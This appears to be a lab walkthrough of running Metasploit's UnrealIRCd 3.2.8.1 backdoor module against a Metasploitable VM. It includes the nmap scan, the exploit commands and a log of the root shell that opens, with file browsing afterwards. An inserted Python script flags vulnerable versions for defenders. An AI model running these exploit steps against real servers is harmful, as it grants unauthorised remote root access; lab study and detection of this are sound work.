control – metasploit unreal_ircd_3281_backdoor

UnrealIRCd is an open source IRC daemon, originally based on DreamForge, and is available for Unix-like operating systems and Windows. Since the beginning of development on UnrealIRCd circa May 1999, many new features have been added and modified, including advanced security features and bug fixes, and it has become a popular server.

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap
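
From the defender's side, the same irc-info banner can drive an inventory check. The following is an added example, not part of the original post: it parses saved nmap output and lists IRC services reporting the Unreal3.2.8.1 release named by the module used below. The sample scan text, its addresses and the function name are constructed for illustration.

```python
import re

# Release named by the Metasploit module on this page (unreal_ircd_3281_backdoor).
FLAGGED_VERSION = "Unreal3.2.8.1"

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)")
# irc-info prints "Version: <ircd version>. <server name>" on a script-output line.
VERSION_RE = re.compile(r"^\|[_ ]?\s*(?:irc-info:\s*)?Version:\s*(\S+)", re.IGNORECASE)

# Constructed sample: two hosts from the documentation address range.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
6667/tcp open irc Unreal ircd
| irc-info: Server: irc.example.lan
| Version: Unreal3.2.8.1. irc.example.lan
|_Source ident: OK nmap
Nmap scan report for 192.0.2.20
6697/tcp open irc Unreal ircd
| irc-info: Server: chat.example.lan
| Version: Unreal3.2.10.4. chat.example.lan
|_Source ident: OK nmap
"""

def find_flagged_ircd(nmap_text):
    """Return [(host, port, version)] for IRC services reporting FLAGGED_VERSION."""
    findings = []
    host, port, service = "unknown", None, ""
    for raw in nmap_text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:  # new host section: forget the previous port
            host, port, service = m.group(1), None, ""
            continue
        m = PORT_RE.match(line)
        if m:
            port, service = int(m.group(1)), m.group(2).lower()
            continue
        m = VERSION_RE.match(line)
        # Only trust a Version line that belongs to an open IRC port.
        if m and port is not None and service.startswith("irc"):
            version = m.group(1).rstrip(".")  # banner ends the version with "."
            if version == FLAGGED_VERSION:
                findings.append((host, port, version))
    return findings

if __name__ == "__main__":
    for host, port, version in find_flagged_ircd(SAMPLE_SCAN):
        print(f"{host}:{port} reports {version}: verify the installed build")
```

A banner match only identifies hosts to review; confirm each one by checking the installed daemon against a verified source package.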

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf  exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 10.255.245.136:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ahaBucJmQvi2ONTC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100

ifconfig

eth0      Link encap:Ethernet  HWaddr 01:02:03:04:05:06
inet addr:IP-Address Bcast:Address  Mask:Mask
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:33523 errors:0 dropped:0 overruns:0 frame:0
TX packets:58400 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
Base address:0xd010 Memory:f0000000-f0020000

ls -l
total 388
-rw------- 1 root root   1365 Jan 20 14:08 Donation
-rw------- 1 root root  17992 Jan 20 14:08 LICENSE
drwx------ 2 root root   4096 Jan 20 14:08 aliases
--w----r-T 1 root root   1175 Jan 20 14:08 badwords.channel.conf
--w----r-T 1 root root   1183 Jan 20 14:08 badwords.message.conf
drwx------ 2 root root   4096 Jan 20 14:08 networks

cd networks

dir

awesomechristians.network  gamescafe.network          networks.ndx
axenet.network           german-elite.network       outsiderz.network
bunker7.network           german-global-irc.network  phazenet.network
burnnet.network           global-irc.network          stormdancing.network
cabonet.network           globalchat.network          template.network
chatcrap.network       icechat.network          thainet.network
chatuniverse.network       infinity.network          unitedirc-org.network
ctcp.network           ircsystems.network          unreal-test.network
darkkaos.network       isno.network              wazzza.network
digitalirc.network       l33t-irc.network          x-irc.network
discussioni.network       lcirc.network          zirc.network
dragonwings.network       makenet
